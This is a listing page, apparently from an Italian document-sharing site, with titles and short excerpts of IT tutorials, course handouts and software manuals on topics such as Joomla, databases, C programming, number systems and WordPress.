Joomla: Come installarlo e come usarlo. A cura di Joomla: Come installarlo e come usarlo. A cura di In questa dispensa andremo a vedere come si installa joomla sul noto software xampp e come viene usato per creare siti web dinamici. Tecnol earn Firmato

Dettagli

Analisi di programmi: Crittografia

Analisi di programmi: Crittografia Analisi di programmi: Crittografia Come caso concreto di sistema, proviamo ad abbozzare e a vedere una prima implementazione di un sistema di crittografia a chiave pubblica La crittografia studia le tecniche

Dettagli

SISTEMI DI NUMERAZIONE E CODICI

SISTEMI DI NUMERAZIONE E CODICI SISTEMI DI NUMERAZIONE E CODICI Il Sistema di Numerazione Decimale Il sistema decimale o sistema di numerazione a base dieci usa dieci cifre, dette cifre decimali, da O a 9. Il sistema decimale è un sistema

Dettagli

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress Copyright Andrea Giavara wppratico.com Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress 1. Il pannello amministrativo 2. I dati importanti 3. Creare il database - Cpanel - Plesk

Dettagli

Funzioni in C. Violetta Lonati

Funzioni in C. Violetta Lonati Università degli studi di Milano Dipartimento di Scienze dell Informazione Laboratorio di algoritmi e strutture dati Corso di laurea in Informatica Funzioni - in breve: Funzioni Definizione di funzioni

Dettagli

CREAZIONE DI UN DATABASE E DI TABELLE IN ACCESS

CREAZIONE DI UN DATABASE E DI TABELLE IN ACCESS CONTENUTI: CREAZIONE DI UN DATABASE E DI TABELLE IN ACCESS Creazione database vuoto Creazione tabella Inserimento dati A) Creazione di un database vuoto Avviamo il programma Microsoft Access. Dal menu

Dettagli

Collegamento e funzionamento di un normale TNC con il D-RATS http://d-rats.danplanet.com

Collegamento e funzionamento di un normale TNC con il D-RATS http://d-rats.danplanet.com + Collegamento e funzionamento di un normale TNC con il D-RATS http://d-rats.danplanet.com A molti è già capitato di utilizzare il software D-RATS con apparati D-STAR o INTERNET, però, non tutti sanno

Dettagli

Le query di raggruppamento

Le query di raggruppamento Le query di raggruppamento Le "Query di raggruppamento" sono delle Query di selezione che fanno uso delle "Funzioni di aggregazione" come la Somma, il Conteggio, il Massimo, il Minimo o la Media, per visualizzare

Dettagli

Algoritmi e strutture dati. Codici di Huffman

Algoritmi e strutture dati. Codici di Huffman Algoritmi e strutture dati Codici di Huffman Memorizzazione dei dati Quando un file viene memorizzato, esso va memorizzato in qualche formato binario Modo più semplice: memorizzare il codice ASCII per

Dettagli

Matematica - SMID : Programmazione Febbraio 2009 FOGLIO RISPOSTE

Matematica - SMID : Programmazione Febbraio 2009 FOGLIO RISPOSTE Matematica - SMID : Programmazione Febbraio 2009 FOGLIO RISPOSTE NOME: COGNOME: ============================================================== Esercizio 1 ci sono tante "righe"; non è detto servano tutte...

Dettagli

Per scrivere una procedura che non deve restituire nessun valore e deve solo contenere le informazioni per le modalità delle porte e controlli

Per scrivere una procedura che non deve restituire nessun valore e deve solo contenere le informazioni per le modalità delle porte e controlli CODICE Le fonti in cui si possono trovare tutorial o esempi di progetti utilizzati con Arduino si trovano nel sito ufficiale di Arduino, oppure nei forum di domotica e robotica. Il codice utilizzato per

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

ESEMPIO 1: eseguire il complemento a 10 di 765

ESEMPIO 1: eseguire il complemento a 10 di 765 COMPLEMENTO A 10 DI UN NUMERO DECIMALE Sia dato un numero N 10 in base 10 di n cifre. Il complemento a 10 di tale numero (N ) si ottiene sottraendo il numero stesso a 10 n. ESEMPIO 1: eseguire il complemento

Dettagli

Registratori di Cassa

Registratori di Cassa modulo Registratori di Cassa Interfacciamento con Registratore di Cassa RCH Nucleo@light GDO BREVE GUIDA ( su logiche di funzionamento e modalità d uso ) www.impresa24.ilsole24ore.com 1 Sommario Introduzione...

Dettagli

Questa guida è realizzata per spiegarvi e semplificarvi l utilizzo del nostro nuovo sito E Commerce dedicato ad Alternatori e Motorini di avviamento.

Questa guida è realizzata per spiegarvi e semplificarvi l utilizzo del nostro nuovo sito E Commerce dedicato ad Alternatori e Motorini di avviamento. Guida all uso del sito E Commerce Axial Questa guida è realizzata per spiegarvi e semplificarvi l utilizzo del nostro nuovo sito E Commerce dedicato ad Alternatori e Motorini di avviamento. Innanzitutto,

Dettagli

f(x) = 1 x. Il dominio di questa funzione è il sottoinsieme proprio di R dato da

f(x) = 1 x. Il dominio di questa funzione è il sottoinsieme proprio di R dato da Data una funzione reale f di variabile reale x, definita su un sottoinsieme proprio D f di R (con questo voglio dire che il dominio di f è un sottoinsieme di R che non coincide con tutto R), ci si chiede

Dettagli

Il sofware è inoltre completato da una funzione di calendario che consente di impostare in modo semplice ed intuitivo i vari appuntamenti.

Il sofware è inoltre completato da una funzione di calendario che consente di impostare in modo semplice ed intuitivo i vari appuntamenti. SH.MedicalStudio Presentazione SH.MedicalStudio è un software per la gestione degli studi medici. Consente di gestire un archivio Pazienti, con tutti i documenti necessari ad avere un quadro clinico completo

Dettagli

1. Introduzione al corso

1. Introduzione al corso E107 WEB SYSTEM Corso on line di progettazione siti dinamici: livello base R E A L I Z Z A Z I O N E D I 1. Introduzione al corso By e107 Italian Team Sito web:http://www.e107italia.org Contatto: admin@e107italia.org

Dettagli

Gestione Risorse Umane Web

Gestione Risorse Umane Web La gestione delle risorse umane Gestione Risorse Umane Web Generazione attestati di partecipazione ai corsi di formazione (Versione V03) Premessa... 2 Configurazione del sistema... 3 Estrattore dati...

Dettagli

1. Struttura di un CMS

1. Struttura di un CMS E107 WEB SYSTEM Corso on line di progettazione siti dinamici: livello base R E A L I Z Z A Z I O N E D I 1. Struttura di un CMS By e107 Italian Team Sito web:http://www.e107italia.org Contatto: admin@e107italia.org

Dettagli

per scrivere un articolo da prima pagina! per inviare una newsletter Come si crea Comunicazione Anfaa Edizione 4a.2013

per scrivere un articolo da prima pagina! per inviare una newsletter Come si crea Comunicazione Anfaa Edizione 4a.2013 per scrivere un articolo da prima pagina! Quando si vuole inserire un articolo che compaia nel riquadro Ultime notizie della home page, si deve impostare la categoria Ultime notizie, in aggiunta a quella

Dettagli

Express Import system

Express Import system Express Import system Manuale del destinatario Sistema Express Import di TNT Il sistema Express Import di TNT Le consente di predisporre il ritiro di documenti, pacchi o pallet in 168 paesi con opzione

Dettagli

MODULO 5 ACCESS Basi di dati. Lezione 4

MODULO 5 ACCESS Basi di dati. Lezione 4 MODULO 5 ACCESS Basi di dati Lezione 4 ARGOMENTI Lezione 4 Filtrare i dati Esempio 1 Query Cos è Creare Query in visualizza struttura Criteri di ricerca Esempio 2 Esempio 3 Esempio 4 Creare Query in creazione

Dettagli

LE FUNZIONI A DUE VARIABILI

LE FUNZIONI A DUE VARIABILI Capitolo I LE FUNZIONI A DUE VARIABILI In questo primo capitolo introduciamo alcune definizioni di base delle funzioni reali a due variabili reali. Nel seguito R denoterà l insieme dei numeri reali mentre

Dettagli

File, Modifica, Visualizza, Strumenti, Messaggio

File, Modifica, Visualizza, Strumenti, Messaggio Guida installare account in Outlook Express Introduzione Questa guida riguarda di sicuro uno dei programmi maggiormente usati oggi: il client di posta elettronica. Tutti, ormai, siamo abituati a ricevere

Dettagli

Esercizi su. Funzioni

Esercizi su. Funzioni Esercizi su Funzioni ๒ Varie Tracce extra Sul sito del corso ๓ Esercizi funz_max.cc funz_fattoriale.cc ๔ Documentazione Il codice va documentato (commentato) Leggibilità Riduzione degli errori Manutenibilità

Dettagli

I sistemi di numerazione

I sistemi di numerazione I sistemi di numerazione 01-INFORMAZIONE E SUA RAPPRESENTAZIONE Sia dato un insieme finito di caratteri distinti, che chiameremo alfabeto. Utilizzando anche ripetutamente caratteri di un alfabeto, si possono

Dettagli

Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO

Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO Login All apertura il programma controlla che sia stata effettuata la registrazione e in caso negativo viene visualizzato un messaggio.

Dettagli

Mac Application Manager 1.3 (SOLO PER TIGER)

Mac Application Manager 1.3 (SOLO PER TIGER) Mac Application Manager 1.3 (SOLO PER TIGER) MacApplicationManager ha lo scopo di raccogliere in maniera centralizzata le informazioni piu salienti dei nostri Mac in rete e di associare a ciascun Mac i

Dettagli

Volumi di riferimento

Volumi di riferimento Simulazione seconda prova Esame di Stato Gestione di un centro agroalimentare all ingrosso Parte prima) Un nuovo centro agroalimentare all'ingrosso intende realizzare una base di dati per l'attività di

Dettagli

La gestione documentale con il programma Filenet ed il suo utilizzo tramite la tecnologia.net. di Emanuele Mattei (emanuele.mattei[at]email.

La gestione documentale con il programma Filenet ed il suo utilizzo tramite la tecnologia.net. di Emanuele Mattei (emanuele.mattei[at]email. La gestione documentale con il programma Filenet ed il suo utilizzo tramite la tecnologia.net di Emanuele Mattei (emanuele.mattei[at]email.it) Introduzione In questa serie di articoli, vedremo come utilizzare

Dettagli

Basi Di Dati, 09/12/2003

Basi Di Dati, 09/12/2003 Basi Di Dati, 09/12/2003 Una concessionaria di auto nuove ed usate vuole automatizzare alcune delle sue attività. L attività che la concessionaria vuole automatizzare riguarda la gestione delle auto nuove,

Dettagli

1.0 GUIDA PER L UTENTE

1.0 GUIDA PER L UTENTE 1.0 GUIDA PER L UTENTE COMINCIA FACILE Una volta effettuato il login vi troverete nella pagina Amministrazione in cui potrete creare e modificare le vostre liste. Una lista è semplicemnte un contenitore

Dettagli

Manuale per la configurazione di AziendaSoft in rete

Manuale per la configurazione di AziendaSoft in rete Manuale per la configurazione di AziendaSoft in rete Data del manuale: 7/5/2013 Aggiornamento del manuale: 2.0 del 10/2/2014 Immagini tratte da Windows 7 Versione di AziendaSoft 7 Sommario 1. Premessa...

Dettagli

Data Base. Master "Bio Info" Reti e Basi di Dati Lezione 6

Data Base. Master Bio Info Reti e Basi di Dati Lezione 6 Data Base 1 Sommario I concetti fondamentali. Database Relazionale.. Query e SQL MySql, Creazione di un db in MySQL con PHPmyAdmin Creazione database e delle Tabelle Query Inserimento Ricerca Modifica

Dettagli

UNA LEZIONE SUI NUMERI PRIMI: NASCE LA RITABELLA

UNA LEZIONE SUI NUMERI PRIMI: NASCE LA RITABELLA UNA LEZIONE SUI NUMERI PRIMI: NASCE LA RITABELLA Tutti gli anni, affrontando l argomento della divisibilità, trovavo utile far lavorare gli alunni sul Crivello di Eratostene. Presentavo ai ragazzi una

Dettagli

I tutorial di MadLabs.. Installazione e prima configurazione

I tutorial di MadLabs.. Installazione e prima configurazione I tutorial di MadLabs.. Installazione e prima configurazione Come installare php nuke Introduzione PHP Nuke è uno dei CMS (content management System) più usati del web. Per chi non lo sapesse, un CMS è

Dettagli

Database e reti. Piero Gallo Pasquale Sirsi

Database e reti. Piero Gallo Pasquale Sirsi Database e reti Piero Gallo Pasquale Sirsi Approcci per l interfacciamento Il nostro obiettivo è, ora, quello di individuare i possibili approcci per integrare una base di dati gestita da un in un ambiente

Dettagli

Manuale Amministratore bloodmanagement.it

Manuale Amministratore bloodmanagement.it 1 Sommario Primo accesso al portale bloodmanagement.it... 2 Richiesta account... 2 Login... 2 Sezione generale... 4 Informazioni sede... 4 Inserimento... 5 Destinazioni... 5 Luogo donazioni... 5 Inserisci

Dettagli

ESAME SCRITTO DI ELEMENTI DI INFORMATICA E PROGRAMMAZIONE. 27 Gennaio 2015

ESAME SCRITTO DI ELEMENTI DI INFORMATICA E PROGRAMMAZIONE. 27 Gennaio 2015 COGNOME E NOME: MATRICOLA: Civile Ambiente e Territorio Non si possono consultare manuali, appunti e calcolatrici. Esercizio 1: [3 punto] Rappresentare i numeri 36 e 91 (in base 10) in notazione binaria

Dettagli

Manuale. Gestione biblioteca scolastica by Rosset Pier Angelo is licensed under a Creative Commons

Manuale. Gestione biblioteca scolastica by Rosset Pier Angelo is licensed under a Creative Commons Manuale Gestione biblioteca scolastica by Rosset Pier Angelo is licensed under a Creative Commons Premessa Gestione Biblioteca scolastica è un software che permette di gestire in maniera sufficientemente

Dettagli

Soluzione dell esercizio del 2 Febbraio 2004

Soluzione dell esercizio del 2 Febbraio 2004 Soluzione dell esercizio del 2 Febbraio 2004 1. Casi d uso I casi d uso sono riportati in Figura 1. Figura 1: Diagramma dei casi d uso. E evidenziato un sotto caso di uso. 2. Modello concettuale Osserviamo

Dettagli

Università degli Studi di Cassino Corso di Fondamenti di Informatica Puntatori. Anno Accademico 2010/2011 Francesco Tortorella

Università degli Studi di Cassino Corso di Fondamenti di Informatica Puntatori. Anno Accademico 2010/2011 Francesco Tortorella Corso di Informatica Puntatori Anno Accademico 2010/2011 Francesco Tortorella Variabili, registri ed indirizzi Abbiamo visto che la definizione di una variabile implica l allocazione (da parte del compilatore)

Dettagli

GUIDA PER LA COMPILAZIONE DEL CAMP3

GUIDA PER LA COMPILAZIONE DEL CAMP3 GUIDA PER LA COMPILAZIONE DEL CAMP3 Prima di tutto va detto cosa e un CAMP3. Il CAMP3 e un modulo (che ufficialmente si chiama Elenco Atleti Partecipanti ), predisposto dalla federazione Italiana Pallavolo,

Dettagli

Modulo 4: Ereditarietà, interfacce e clonazione

Modulo 4: Ereditarietà, interfacce e clonazione Modulo 4: Ereditarietà, interfacce e clonazione Argomenti Trattati: Classi, Superclassi e Sottoclassi Ereditarietà Ereditarietà ed Attributi Privati Override super Ereditarietà e Costruttori Polimorfismo

Dettagli

Manuale d uso Lexun Area Riservata proprietà di logos engineering - Sistema Qualità certificato ISO 9001 Det Norske Veritas Italia

Manuale d uso Lexun Area Riservata proprietà di logos engineering - Sistema Qualità certificato ISO 9001 Det Norske Veritas Italia Pag. 1/5 Vi permetterà di gestire lo scambio di file con colleghi o clienti in maniera semplice, veloce e sicura. Potrete creare delle cartelle da condividere con i Vostri utenti e inserirvi all interno

Dettagli

URI. Introduzione. Pag. 1

URI. Introduzione. Pag. 1 URI Introduzione Gli URI (Universal Resource Indentifier) sono una sintassi usata in WWW per definire i nomi e gli indirizzi di oggetti (risorse) su Internet. Questi oggetti sono considerati accessibili

Dettagli

IL MIO PRIMO SITO: NEWS

IL MIO PRIMO SITO: NEWS Pagina 1 IL MIO PRIMO SITO: NEWS Sommario IL MIO PRIMO SITO: NEWS...1 Introduzione...2 I Contenitori...2 Creo un Contenitore...3 I Tracciati...4 Creo le Notizie...6 Inserisco il Testo...6 Inserisco un

Dettagli

Guida Compilazione Piani di Studio on-line

Guida Compilazione Piani di Studio on-line Guida Compilazione Piani di Studio on-line SIA (Sistemi Informativi d Ateneo) Visualizzazione e presentazione piani di studio ordinamento 509 e 270 Università della Calabria (Unità organizzativa complessa-

Dettagli

Una piattaforma per creare blog, che utilizza il linguaggio PHP e si

Una piattaforma per creare blog, che utilizza il linguaggio PHP e si 1^ Puntata WordPress è un ottimo CMS (Content Management System) Una piattaforma per creare blog, che utilizza il linguaggio PHP e si avvale di un database Mysql. Un CMS è quindi un sistema di gestione

Dettagli

GUIDA ALL UTILIZZO DELL OSSERVATORIO DELLE PROFESSIONI PERMANENTE

GUIDA ALL UTILIZZO DELL OSSERVATORIO DELLE PROFESSIONI PERMANENTE GUIDA ALL UTILIZZO DELL OSSERVATORIO DELLE PROFESSIONI PERMANENTE A tutti i soci Assores Anno 2009 Carissimi soci, Vi presentiamo una guida dettagliata sull utilizzo dell Osservatorio delle Professioni

Dettagli

Le stringhe. Le stringhe

Le stringhe. Le stringhe Informatica: C++ Gerboni Roberta Stringhe di caratteri (esempi di utilizzo dei vettori) Nel linguaggio C++ una stringa è semplicemente un vettore di caratteri Vettori di caratteri La stringa "hello" è

Dettagli

Organizzazione degli archivi

Organizzazione degli archivi COSA E UN DATA-BASE (DB)? è l insieme di dati relativo ad un sistema informativo COSA CARATTERIZZA UN DB? la struttura dei dati le relazioni fra i dati I REQUISITI DI UN DB SONO: la ridondanza minima i

Dettagli

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti Potete immaginare un ufficio senza archivio? Sarebbe un inferno. Dover rintracciare

Dettagli

1 Copyright ChateXpert

1 Copyright ChateXpert Manuale D Uso di ChateXpert FREE 1 Copyright ChateXpert Per in inserire uno dei nostri servizi di community nel proprio sito è necessario prima registrarsi sul sito di ChateXpert.it http://www.chatexpert.it/planet/webmaster.asp

Dettagli

IL MODELLO CICLICO BATTLEPLAN

IL MODELLO CICLICO BATTLEPLAN www.previsioniborsa.net 3 Lezione METODO CICLICO IL MODELLO CICLICO BATTLEPLAN Questo modello ciclico teorico (vedi figura sotto) ci serve per pianificare la nostra operativita e prevedere quando il mercato

Dettagli

GUIDA AL SITO DELLE RIPARAZIONI BARWARE SOMMARIO

GUIDA AL SITO DELLE RIPARAZIONI BARWARE SOMMARIO GUIDA AL SITO DELLE RIPARAZIONI BARWARE SOMMARIO Introduzione...2 1. Registrazione al sito delle riparazioni...2 2. Login e Home page...6 3. Assistenza...8 3a. Nuova richiesta di riparazione...8 3b. Lista

Dettagli

PROGRAMMA GESTIONE TURNI MANUALE UTENTE. Programma Gestione Turni Manuale Utente versione 1.1

PROGRAMMA GESTIONE TURNI MANUALE UTENTE. Programma Gestione Turni Manuale Utente versione 1.1 PROGRAMMA GESTIONE TURNI MANUALE UTENTE INDICE 1 PREMESSA 3 2 COMANDI COMUNI 3 3 SEDI 3 4 FESTIVITÀ 4 5 PERIODI TURNI 4 6 COD. TURNI 6 7 TURNI SPORTIVI 9 8 COD. EQUIPAGGI 9 9 DISPONIBILITÀ 10 10 INDISPONIBILITÀ

Dettagli

Capitolo 13. Interrogare una base di dati

Capitolo 13. Interrogare una base di dati Capitolo 13 Interrogare una base di dati Il database fisico La ridondanza è una cosa molto, molto, molto brutta Non si devono mai replicare informazioni scrivendole in più posti diversi nel database Per

Dettagli

1/15. Manuale d uso. Rev.1 del 18 Settembre 2013 Rev.2 del 24 Settembre 2013 Rev.3 del 9 Dicembre 2013

1/15. Manuale d uso. Rev.1 del 18 Settembre 2013 Rev.2 del 24 Settembre 2013 Rev.3 del 9 Dicembre 2013 1/15 Manuale d uso Rev.1 del 18 Settembre 2013 Rev.2 del 24 Settembre 2013 Rev.3 del 9 Dicembre 2013 2/15 Sommario Guida all'uso del Portale Pubblicitario di Condé Nast Italia Home Page Pagina post-login

Dettagli

Informazione analogica e digitale

Informazione analogica e digitale L informazione L informazione si può: rappresentare elaborare gestire trasmettere reperire L informatica offre la possibilità di effettuare queste operazioni in modo automatico. Informazione analogica

Dettagli

INTRODUZIONE AGLI ALGORITMI INTRODUZIONE AGLI ALGORITMI INTRODUZIONE AGLI ALGORITMI INTRODUZIONE AGLI ALGORITMI

INTRODUZIONE AGLI ALGORITMI INTRODUZIONE AGLI ALGORITMI INTRODUZIONE AGLI ALGORITMI INTRODUZIONE AGLI ALGORITMI INTRODUZIONE AGLI ALGORITMI Prima di riuscire a scrivere un programma, abbiamo bisogno di conoscere un metodo risolutivo, cioè un metodo che a partire dai dati di ingresso fornisce i risultati attesi.

Dettagli

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Manuale Amministratore Legalmail Enterprise Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Pagina 2 di 16 Manuale Amministratore Legalmail Enterprise Introduzione a Legalmail Enterprise...3

Dettagli

Informatica per la comunicazione" - lezione 13 -

Informatica per la comunicazione - lezione 13 - Informatica per la comunicazione" - lezione 13 - Funzionamento di una password" 1: l utente tramite il suo browser richiede l accesso a una pagina del server; 2: il server richiede il nome utente e la

Dettagli